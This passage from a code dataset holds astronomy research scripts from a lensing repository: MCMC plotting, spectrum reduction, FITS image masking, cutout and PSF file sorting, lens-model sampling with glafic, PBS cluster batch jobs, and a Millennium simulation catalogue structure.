mcmcfinal[i][15] = mcmcfinal[i][11]\n mcmcfinal[i][8] = mcmc[i][12]; mcmcfinal[i][9] = mcmc[i][13]; mcmcfinal[i][10] = mcmc[i][14]; mcmcfinal[i][11] = mcmc[i][15]\n\nnp.savetxt('%s' % (fileoutorig[:-4] + \"mcmc.dat\"),mcmcfinal,fmt=\"%.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f\")\nos.system(\"rm %s\" % (fileoutorig[:-5]+\".dat\"))\nmcmc = np.loadtxt(fileoutorig[:-4] + \"mcmc.dat\",usecols=[2,3,6,7,10,11,14,15,16,17,18])\n\n# now remove the column with no dynamic range (time delay = 0 for the reference image)\nmcmcfinal = np.delete(mcmc,1,1)\n\r\nfigure = corner.corner(mcmcfinal, labels=np.linspace(1,np.shape(mcmcfinal)[0],np.shape(mcmcfinal)[0]).astype(int).tolist(),quantiles=[0.16, 0.5, 0.84],show_titles=True, title_kwargs={\"fontsize\": 12})\r\nfigure.savefig(fileoutorig[:-4] + \"mcmc.png\", dpi=100)\r\n\r\n" }, { "alpha_fraction": 0.6770833134651184, "alphanum_fraction": 0.7202380895614624, "avg_line_length": 32.599998474121094, "blob_id": "1af6e2dd9e9ad36671da0f758095ea7fa7d2e4dd", "content_id": "72dfe27040e64283e9274355c508f1a86218590b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 672, "license_type": "no_license", "max_line_length": 82, "num_lines": 20, "path": "/python/learn/LRISmosredux.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "from LRIS.resample import resample\nfrom LRIS.LRIStools import *\nfrom LRIS.XSolve import *\n\nindir = '/Users/eduardrusu/Desktop/Reduction/1206m1'\npref = 'r170322_'\nflat = 31\narc = 32\noutname = '1206m1_red'\nslitID(indir,pref,[flat,arc,28],outname,side='bottom')\noldName = None\nsf = True # Update to determine whether you want to see the fit for every exposure\nfor img in [28,29,33]:\n newName = '%s_%2d'%(outname,img)\n XSolve(outname,newName,indir,pref,[flat,arc,img])\n SlitCross(newName,showFit=sf)\n WaveSolve(newName,oldName,showFit=sf)\n resample(newName,nobgsub=False,clobber=True)\n oldName = newName\n sf = True # Don't show the fit anymore if True...\n" }, { "alpha_fraction": 0.7184942960739136, "alphanum_fraction": 0.7610474824905396, "avg_line_length": 37.1875, "blob_id": "62b64a4928f06d45eb0fbbc10ba725290985663c", "content_id": "0fc1d6ff4a4ad75c5fc08d49b24f5a44cae60924", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 611, "license_type": "no_license", "max_line_length": 97, "num_lines": 16, "path": "/python/image_utilities/maskconvolve.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple script to change pixel values in custom regions extended by convolution\n\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.convolution import Gaussian2DKernel\nfrom astropy.convolution import convolve_fft\n\nimage = fits.open('/Users/cerusu/OneDrive - Subaru Telescope/PG1115/tmp_obj.fits')\ndata = image[0].data\ndata[data == 0] = -1000\nkernel = Gaussian2DKernel(10)\nconv = convolve_fft(data, kernel, allow_huge=True)\nconv[conv < -100] = 0\nconv[conv != 0] = 1\nimage[0].data = image[0].data * conv\nimage.writeto('/Users/cerusu/OneDrive - Subaru Telescope/PG1115/tmp_objexpand.fits',clobber=True)\n" }, { "alpha_fraction": 0.6681715846061707, "alphanum_fraction": 0.7674943804740906, "avg_line_length": 23.61111068725586, "blob_id": "c4564654ea5c130aaa65982ee892bea35a37d307", "content_id": "b8f368f6de545e93c26b8a07c1be027b8082e84b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 443, "license_type": "no_license", "max_line_length": 100, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer31.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log31.out\n#PBS -e Log31.err\n#PBS -N 31\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2228.py WFI2033 5 45 23 meds gal oneoverr mass3overrrms\npython inferkappa_unbiasedwithshearincrement2224.py WFI2033 5 120 23 meds gal oneoverr mass3overrrms\n" }, { "alpha_fraction": 0.5935727953910828, "alphanum_fraction": 0.6283262968063354, "avg_line_length": 60.9549560546875, "blob_id": "85d9002df9cd490f4e4b1c8cbe0169963638003e", "content_id": "76cdd993b6286e40cb201c1e71c62d7d8583c11f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6877, "license_type": "no_license", "max_line_length": 183, "num_lines": 111, "path": "/python/image_utilities/HSCmatchcutoutpsffinalize.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Run after running Topcat on the outputs from HSCmatchcutoutpsf.py. This code renames the files which are suitable for CHITAH.\n# run as python HSCmatchcutoutpsffinalize.py\n\n#from astropy.io import fits\nimport numpy as np\nimport os\nimport glob\nfrom astropy.wcs import WCS\nfrom astropy.io import fits\n\npath = \"/Volumes/LaCieSubaru/Gaia/James/\"\nos.chdir(path)\n# read the outputs from Topcat\n# It seems when I have columns of strings I need to read one column at a time, or they are not searchable...\n# ... so I cannot do cutoutspsf_g = np.genfromtxt('cutoutspsf_g.cat',usecols=[0,4,6,7],dtype=\"S90,S90,float,float\")\ncutoutspsf_g_cutout = np.genfromtxt('cutoutspsf_g.cat',usecols=[0],dtype=\"S90\")\ncutoutspsf_g_psf = np.genfromtxt('cutoutspsf_g.cat',usecols=[4],dtype=\"S90\")\ncutoutspsf_g_coord = np.loadtxt('cutoutspsf_g.cat',usecols=[6,7])\n\ncutoutspsf_r_cutout = np.genfromtxt('cutoutspsf_r.cat',usecols=[0],dtype=\"S90\")\ncutoutspsf_r_psf = np.genfromtxt('cutoutspsf_r.cat',usecols=[4],dtype=\"S90\")\ncutoutspsf_r_coord = np.loadtxt('cutoutspsf_r.cat',usecols=[6,7])\n\ncutoutspsf_i_cutout = np.genfromtxt('cutoutspsf_i.cat',usecols=[0],dtype=\"S90\")\ncutoutspsf_i_psf = np.genfromtxt('cutoutspsf_i.cat',usecols=[4],dtype=\"S90\")\ncutoutspsf_i_coord = np.loadtxt('cutoutspsf_i.cat',usecols=[6,7])\n\ncutoutspsf_z_cutout = np.genfromtxt('cutoutspsf_z.cat',usecols=[0],dtype=\"S90\")\ncutoutspsf_z_psf = np.genfromtxt('cutoutspsf_z.cat',usecols=[4],dtype=\"S90\")\ncutoutspsf_z_coord = np.loadtxt('cutoutspsf_z.cat',usecols=[6,7])\n\ncutoutspsf_y_cutout = np.genfromtxt('cutoutspsf_y.cat',usecols=[0],dtype=\"S90\")\ncutoutspsf_y_psf = np.genfromtxt('cutoutspsf_y.cat',usecols=[4],dtype=\"S90\")\ncutoutspsf_y_coord = np.loadtxt('cutoutspsf_y.cat',usecols=[6,7])\n\npsf_onlybandg = np.genfromtxt('psf_onlybandg.cat',usecols=[0],dtype=\"S90\")\npsf_onlybandr = np.genfromtxt('psf_onlybandr.cat',usecols=[0],dtype=\"S90\")\npsf_onlybandi = np.genfromtxt('psf_onlybandi.cat',usecols=[0],dtype=\"S90\")\npsf_onlybandz = np.genfromtxt('psf_onlybandz.cat',usecols=[0],dtype=\"S90\")\npsf_onlybandy = np.genfromtxt('psf_onlybandy.cat',usecols=[0],dtype=\"S90\")\n\nfolder_cutout = glob.glob('arch*')\nfolder_psf = glob.glob('psf-*')\nlist_cutout = np.array([])\nfor i in range(len(folder_cutout)):\n files = glob.glob('%s/*' % folder_cutout[i])\n files_array = np.asarray(files)\n list_cutout = np.r_[list_cutout,files_array]\n\nos.system(\"mkdir S17AforJames\")\nos.system(\"mkdir S17Aonebandpsf\")\nos.system(\"mkdir S17Anopsf\")\n\nfor i in range(len(list_cutout)):\n if '-G-' in list_cutout[i]:\n if list_cutout[i] in cutoutspsf_g_cutout:\n psf = cutoutspsf_g_psf[np.where(cutoutspsf_g_cutout == list_cutout[i])[0][0]]\n coord = cutoutspsf_g_coord[np.where(cutoutspsf_g_cutout == list_cutout[i])[0][0]]\n if psf not in psf_onlybandg:\n os.system(\"cp %s S17AforJames/cutout_%.5f_%.5f_G.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17AforJames/psf_%.5f_%.5f_G.fits\" % (psf,coord[0],coord[1]))\n else:\n os.system(\"cp %s S17Aonebandpsf/cutout_%.5f_%.5f_G.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17Aonebandpsf/psf_%.5f_%.5f_G.fits\" % (psf,coord[0],coord[1]))\n else: os.system(\"cp %s S17Anopsf/cutout_%.5f_%.5f_G_%d.fits\" % (list_cutout[i],coord[0],coord[1],i)) # adding the number to the name so I don't lose files with identical input\n if '-R-' in list_cutout[i]:\n if list_cutout[i] in cutoutspsf_r_cutout:\n psf = cutoutspsf_r_psf[np.where(cutoutspsf_r_cutout == list_cutout[i])[0][0]]\n coord = cutoutspsf_r_coord[np.where(cutoutspsf_r_cutout == list_cutout[i])[0][0]]\n if psf not in psf_onlybandr:\n os.system(\"cp %s S17AforJames/cutout_%.5f_%.5f_R.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17AforJames/psf_%.5f_%.5f_R.fits\" % (psf,coord[0],coord[1]))\n else:\n os.system(\"cp %s S17Aonebandpsf/cutout_%.5f_%.5f_R.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17Aonebandpsf/psf_%.5f_%.5f_R.fits\" % (psf,coord[0],coord[1]))\n else: os.system(\"cp %s S17Anopsf/cutout_%.5f_%.5f_R_%d.fits\" % (list_cutout[i],coord[0],coord[1],i))\n if '-I-' in list_cutout[i]:\n if list_cutout[i] in cutoutspsf_i_cutout:\n psf = cutoutspsf_i_psf[np.where(cutoutspsf_i_cutout == list_cutout[i])[0][0]]\n coord = cutoutspsf_i_coord[np.where(cutoutspsf_i_cutout == list_cutout[i])[0][0]]\n if psf not in psf_onlybandi:\n os.system(\"cp %s S17AforJames/cutout_%.5f_%.5f_I.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17AforJames/psf_%.5f_%.5f_I.fits\" % (psf,coord[0],coord[1]))\n else:\n os.system(\"cp %s S17Aonebandpsf/cutout_%.5f_%.5f_I.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17Aonebandpsf/psf_%.5f_%.5f_I.fits\" % (psf,coord[0],coord[1]))\n else: os.system(\"cp %s S17Anopsf/cutout_%.5f_%.5f_I_%d.fits\" % (list_cutout[i],coord[0],coord[1],i))\n if '-Z-' in list_cutout[i]:\n if list_cutout[i] in cutoutspsf_z_cutout:\n psf = cutoutspsf_z_psf[np.where(cutoutspsf_z_cutout == list_cutout[i])[0][0]]\n coord = cutoutspsf_z_coord[np.where(cutoutspsf_z_cutout == list_cutout[i])[0][0]]\n if psf not in psf_onlybandz:\n os.system(\"cp %s S17AforJames/cutout_%.5f_%.5f_Z.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17AforJames/psf_%.5f_%.5f_Z.fits\" % (psf,coord[0],coord[1]))\n else:\n os.system(\"cp %s S17Aonebandpsf/cutout_%.5f_%.5f_Z.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17Aonebandpsf/psf_%.5f_%.5f_Z.fits\" % (psf,coord[0],coord[1]))\n else: os.system(\"cp %s S17Anopsf/cutout_%.5f_%.5f_Z_%d.fits\" % (list_cutout[i],coord[0],coord[1],i))\n if '-Y-' in list_cutout[i]:\n if list_cutout[i] in cutoutspsf_y_cutout:\n psf = cutoutspsf_y_psf[np.where(cutoutspsf_y_cutout == list_cutout[i])[0][0]]\n coord = cutoutspsf_y_coord[np.where(cutoutspsf_y_cutout == list_cutout[i])[0][0]]\n if psf not in psf_onlybandy:\n os.system(\"cp %s S17AforJames/cutout_%.5f_%.5f_Y.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17AforJames/psf_%.5f_%.5f_Y.fits\" % (psf,coord[0],coord[1]))\n else:\n os.system(\"cp %s S17Aonebandpsf/cutout_%.5f_%.5f_Y.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17Aonebandpsf/psf_%.5f_%.5f_Y.fits\" % (psf,coord[0],coord[1]))\n else: os.system(\"cp %s S17Anopsf/cutout_%.5f_%.5f_Y_%d.fits\" % (list_cutout[i],coord[0],coord[1],i))\n\nos.chdir(\"/Users/cerusu/GITHUB/zMstarPDF/python/image_utilities\")\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": "de4cfb54d474cedbd784efb1f9a0faa29a47e879", "content_id": "932633209fa2d047e74cdad60e491e5cb68ba404", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium7.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python extractMillennium_Henriques.py GGL_los_8_6_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_6_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_6_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_6_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_6_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_6_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_6_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_6_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { "alpha_fraction": 0.5135782957077026, "alphanum_fraction": 0.6046326160430908, "avg_line_length": 51.16666793823242, "blob_id": "4fb46e928f71aac6179f0fad6f0c3d8fa4bdac56", "content_id": "aa529c4b5e2a848da7b2cc36257fab3a1c4f425a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2504, "license_type": "no_license", "max_line_length": 346, "num_lines": 48, "path": "/python/catalogue_utilities/photozMilleniumcheckpresence.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# This code checks, for a given file in the simulation catalogue, if photoz has been computed successfuly for each of the i<24 galaxies in the catalogue\n# run from the /code folder as: python photozMilleniumcheckpresence.py /Volumes/G-RAIDStudio/simulations/lensing_simulations/Guo_galaxies/GGL_los_8_7_7_0_0_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63.images.txt /Volumes/G-RAIDStudio/simulations/lensing_simulations/Guo_galaxies/GGL_los_8_7_7_0_0_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63.pdz nr\n# DO NOT RUN IT IN THE SAME TIME WITH photozMilleniumcheckpresence.py because they use the same count.lst files\n# where nr is just a number, wchich should be different for each concurrent execution\n\nimport sys\nimport os\nfrom os import system\nimport time\n\nstart_timefield = time.time()\n\nos.system(\"wc %s > count%s.lst\" % (str(sys.argv[1]),str(sys.argv[3]))) # need to know how many lines in file 1\nwith open('count%s.lst' % str(sys.argv[3])) as count:\n for line in count:\n size=line.split()[0]\npos=0 # position in file 2\nposremember=0\n#print int(size)\nord=0 # position in file 1\nwith open(str(sys.argv[1])) as search_for:\n for gal_for in search_for:\n ord=ord+1\n if gal_for!=\"\\n\":\n if gal_for.split()[0]!=\"GalID\" and (float(gal_for.split()[15]) <= 24):\n gal_for_ID = gal_for.split()[0]\n present=\"false\"\n with open(str(sys.argv[2])) as search_in:\n for i in xrange(pos):\n search_in.next()\n for gal_in in search_in:\n pos=pos+1\n if gal_in!=\"\\n\":\n if gal_in.split()[0]==gal_for_ID:\n present=\"true\"\n posremember=pos\n break\n #print pos\n if (pos==int(size)) and (present==\"false\"): #need the 2nd condition, or the last element is considered not found\n pos=posremember\n print gal_for_ID, \"not found!\"\n if ord in [1000, 10000, 20000, 30000, 40000, 50000, 60000, 70000, 80000, 90000, 100000, 110000, 120000, 130000, 140000, 150000, 160000, 170000, 180000, 190000, 200000, 210000, 220000, 230000, 240000, 250000, 260000, 270000, 280000, 290000, 300000]:\n print ord, \"objects...\"\nos.system(\"rm count%s.lst\" % str(sys.argv[3]))\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": "3866b3e46d8181879e579dad86d15dac1e54437b", "content_id": "bd2c61655b4bc609dfffde2cb72d6523c0772beb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium5.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python extractMillennium_Henriques.py GGL_los_8_4_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_4_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_4_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_4_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_4_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_4_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_4_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_4_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { "alpha_fraction": 0.5873417854309082, "alphanum_fraction": 0.7426160573959351, "avg_line_length": 48.375, "blob_id": "81b35157a0af7f06fc688cce57bce3a1ca95e904", "content_id": "4163a5d83029f527763fb46cf3142a358633dc91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1185, "license_type": "no_license", "max_line_length": 119, "num_lines": 24, "path": "/python/scripts/NAOJ/batch1_insertstars_.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb1_.out\n#PBS -e Logb1_.err\n#PBS -N 1_\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_1_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_2_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_3_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_4_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_5_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_6_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_7_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\n" }, { "alpha_fraction": 0.5531741976737976, "alphanum_fraction": 0.610689103603363, "avg_line_length": 43.79268264770508, "blob_id": "06968a2112b73aace7e02c355958f121346b7505", "content_id": "157fac8645bde6410f001213e2b2691a96d2f4ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3686, "license_type": "no_license", "max_line_length": 440, "num_lines": 82, "path": "/python/modeling_utilities/samplelenslocation.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Samples from an observed lens parameter scatter (such as the lens position) and optimizes, then gathers the output of interest. In this particular case I sample from the lens position, and I adopt the limiting chi^2=9.21[ + best original fit chi^2] (Avni 1976 for 2 parametes at 3 sigma). When reading the chi^2 I only consider the point contribution, not the lens. For the lens contribution I compute it using the observed distance prior\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport corner\r\n\nsample = 10000\nposx = 0.74\nposx_sigma = 0.04\nposy = 0.75\nposy_sigma = 0.10\nx = np.random.normal(posx, posx_sigma, sample)\ny = np.random.normal(posy, posy_sigma, sample)\nlimchi = 0.13 + 9.21\n\nlistchi = np.array([])\nlistx = np.array([])\nlisty = np.array([])\nlist1 = np.array([])\nlist2 = np.array([])\nlist3 = np.array([])\nlist4 = np.array([])\n\r\nfilein = \"insample.input\"\nfileprior = \"priorsample.dat\"\nfileout = \"outsample_optresult.dat\"\nfileimag = \"outsample_point.dat\"\n\nfor i in range(sample):\n with open(filein, 'r') as f:\n glafic = f.readlines()\n glafic[28-1] = glafic[28-1].replace(glafic[28-1].split()[3],str(x[i]))\n glafic[28-1] = glafic[28-1].replace(glafic[28-1].split()[4],str(y[i]))\n glafic[29-1] = glafic[29-1].replace(glafic[29-1].split()[3],str(x[i]))\n glafic[29-1] = glafic[29-1].replace(glafic[29-1].split()[4],str(y[i]))\n with open(filein, 'w') as f:\n f.writelines(glafic)\n with open(fileprior, 'r') as f:\n prior = f.readlines()\n prior[1-1] = \"gauss lens 1 2 %s 0.01 \\n\" % str(x[i])\n prior[2-1] = \"gauss lens 1 3 %s 0.01 \\n\" % str(y[i])\n with open(fileprior, 'w') as f:\n f.writelines(prior)\r\n os.system(\"glafic %s\" % filein)\n with open(fileimag, 'r') as f:\n interest = f.readlines()\n if len(interest) == 5: # accept only if the model creates 4 images\n with open(fileout, 'r') as f:\n interest = f.readlines()\n for j in range(len(interest)):\n if \"point no 1\" in interest[j]:\n value = float(interest[j].split()[4]) + float(interest[j].split()[6]) + ((x[i]-posx)/posx_sigma)**2 + ((y[i]-posy)/posy_sigma)**2\n if value <= limchi:\n for j in range(len(interest)):\n if \"sie\" in interest[j]:\n value1 = float(interest[j].split()[5])\n value2 = float(interest[j].split()[6])\n for j in range(len(interest)):\n if \"pert\" in interest[j]:\n value3 = float(interest[j].split()[5])\n value4 = float(interest[j].split()[6])\n listchi = np.append(listchi,value)\n listx = np.append(listx,x[i])\n listy = np.append(listy,y[i])\n list1 = np.append(list1,value1)\n list2 = np.append(list2,value2)\n list3 = np.append(list3,value3)\n list4 = np.append(list4,value4)\nnp.savetxt(\"sample.dat\",np.c_[listchi,listx,listy,list1,list2,list3,list4],fmt=\"%.6e %.6e %.6e %.6e %.6e %.6e %.6e\")\n\nsample = np.loadtxt(\"sample.dat\",unpack=True)\n#sample1 = sample[0][sample[0] < 2.3+0.13]\n#sample2 = sample[1][sample[0] < 2.3+0.13]\n#sample3 = sample[2][sample[0] < 2.3+0.13]\n#sample4 = sample[3][sample[0] < 2.3+0.13]\n#sample5 = sample[4][sample[0] < 2.3+0.13]\n#sample6 = sample[5][sample[0] < 2.3+0.13]\n#sample7 = sample[6][sample[0] < 2.3+0.13]\n#sample=np.vstack((sample1,sample2,sample3,sample4,sample5,sample6,sample7))\nfigure = corner.corner(sample[1:np.shape(sample)[0]].T, labels=np.linspace(1,np.shape(sample)[0],np.shape(sample)[0]).astype(int).tolist(),quantiles=[0.16, 0.5, 0.84],show_titles=True, title_kwargs={\"fontsize\": 12})\nfigure.savefig(\"sample.png\", dpi=100)\n\n\r\n\r\n" }, { "alpha_fraction": 0.46459347009658813, "alphanum_fraction": 0.5020607113838196, "avg_line_length": 96.40876007080078, "blob_id": "d00a455c2469d7113ca5bd90b07d178552ceadfb", "content_id": "e51eff4086000fd4b13cd56f1bcbe5b91b917218", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13345, "license_type": "no_license", "max_line_length": 292, "num_lines": 137, "path": "/python/catalogue_utilities/class_Henriques2014.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "import numpy as np\n\nclass Henriques2014():\n \"\"\"\n Returns the structure of the files of type GGL_los_8_0_0_N_4096_ang_4_Henriques2014_galaxies_on_plane_63_f.images.\n \"\"\"\n galaxy_struct = np.dtype([\n ('galaxy_id' ,'i8' ), #0_LL $ , , id of galaxy (unique)\n ('halo_id' ,'i8' ), #0_LL $ , , id of (sub)halo, the galaxy belongs to(?)\n ('first_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('next_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('last_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('FOF_central_gal' ,'i8' ), #0_LL $ , , id of fof halo the galaxy belong to (i.e. common id for all galaxies in same group or cluster)\n ('file_tree_nr' ,'i8' ), #0_LL $ , , id of file containing the merger tree the galaxy belongs to\n ('descendant_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('main_leaf_id' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('tree_root_id' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('subhalo_id' ,'i8' ), #0_LL $ , , id of (sub)halo, the galaxy belongs to(?)\n ('main_subhalo_id' ,'i8' ), #0_LL $ , , id of main (sub)halo of fof halo, the galaxy belongs to(?)\n ('peano_key' ,'i4' ), #0L $ , , id of small subcube of simulation cube containing galaxy\n ('redshift' ,'f4' ), #0.0 $ , , redshift of galaxy\n ('type' ,'i4' ), #0L $ , , indicated positional status of galaxy in fof group (0 = central, 1 = satellite with subhalo, 2= satellite without resolved subhalo)\n ('snapshot_number' ,'i4' ), #0L $ , , simulation snapshot the galaxy belongs to\n ('group_number' ,'i4' ), #0L $ , , yet another id of the fof halo the galaxy belongs to\n ('next_group_number' ,'i4' ), #0L $ , , yet another id of the fof halo the galaxy will belong to in the next snapshot\n ('cube_index' ,'i4' ), #0L $ , , index of periodic copy of simulation cube the galaxy is located\n ('central_m_vir' ,'f4' ), #0.0 $ , [10^10 Msun/h] , virial mass (as defined by m_crit200) of the FOF group the galaxy resides in.\n ('central_r_vir' ,'f4' ), #0.0 $ , [Mpc/h] , virial radius (as defined by r_crit200) of the FOF group the galaxy resides in\n ('position' ,'f4', 3), #fltarr(3) $ , [rad, rad, Mpc/h] , angular position (first two components) and line-of-sight comoving distance (last component) of galaxy\n ('velocity' ,'f4', 3), #fltarr(3) $ , [km/s] , physical peculiar velocity of galaxy (first two components transverse, last component parallel to l.o.s.)\n ('len' ,'i4' ), #0L $ , , number of particle in subhalo associated with galaxy\n ('m_vir' ,'f4' ), #0.0 $ , [10^10 Msun/h] , virial mass (as defined by m_crit200) of the FOF group this galaxy was in when last it was a type 0 galaxy. I.e. current mass for type 0 galaxies, \"infall virial mass\" for type 1,2 galaxies.\n ('r_vir' ,'f4' ), #0.0 $ , [Mpc/h] , comoving virial radius (as defined by r_crit200) of the FOF group this galaxy was in when last it was a type 0 galaxy. I.e. current virial radius for type 0 galaxies, \"infall virial radius\" for type 1,2 galaxies\n ('v_vir' ,'f4' ), #0.0 $ , [km/s] , physical virial velocity of the subhalo the galaxy is/was the center of.\n ('v_max' ,'f4' ), #0.0 $ , [km/s] , physical maximum rotational velocity of the subhalo of which this galaxy is the center, or the last value for satellite galaxies.\n ('gas_spin' ,'f4', 3), #fltarr(3) $ , [Mpc/h km/s] , spin of the cold gas disk of galaxy\n ('stellar_spin' ,'f4', 3), #fltarr(3) $ , [Mpc/h km/s] , spin of the stellar disk of galaxy\n ('infall_v_max' ,'f4' ), #0.0 $ , [km/s] , physical maximum rotational velocity of the host halo of this galaxy atinfallSnap.\n ('infall_v_max_peak' ,'f4' ), #0.0 $ , [km/s] , physical maximum past rotational velocity of the host halo of this galaxy.\n ('infall_snap' ,'f4' ), #0L $ , , id of snapshot the galaxy lost type = 0 status\n ('infall_hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun/h] , mass in hot gas at the time of infall (same as hotGas for type 0 galaxies).\n ('hot_radius' ,'f4' ), #0.0 $ , [Mpc/h] , radius out to which hot gas extends: rvir for type 0; 0 for type 2; maximum radius out to which hot gas is not stripped for type 1.\n ('ori_merg_time' ,'f4' ), #0.0 $ , [yr] , estimated dyniamical friction time (in years) when the merger clock is set.\n ('merg_time' ,'f4' ), #0.0 $ , [yr] , estimated remaining merging time (in years). oriMergeTime - time since the merger clock is set.\n ('distance_to_central_gal' ,'f4', 3), #fltarr(3) $ , [Mpc/h (?)] , distance between this galaxy and the central galaxy of the fof group\n ('cold_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , Mass in the cold gas disk.\n 